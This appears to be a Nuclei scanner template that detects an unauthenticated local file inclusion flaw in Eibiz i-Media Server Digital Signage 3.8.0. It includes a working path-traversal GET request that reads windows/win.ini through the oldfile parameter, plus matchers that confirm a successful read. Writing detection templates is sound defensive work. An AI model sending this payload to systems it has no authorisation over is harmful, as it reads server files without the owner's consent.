id: eibiz-lfi

info:
  name: Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion
  author: 0x_akoko
  severity: high
  description: Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
  reference:
    - https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,eibiz,packetstorm,windows

http:
  - method: GET
    path:
      - "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# digest: 4b0a004830460221009065dd6a3e2e2eb2a797a50b890d5b8f9e1d6d425ce09a721a1da79b4b9cf77b022100b4837771e84b76008ab5084aa8a72b3065f57c1e23baada46c5b4431e8e86b20:922c64590222798bb761d5b6d8e72950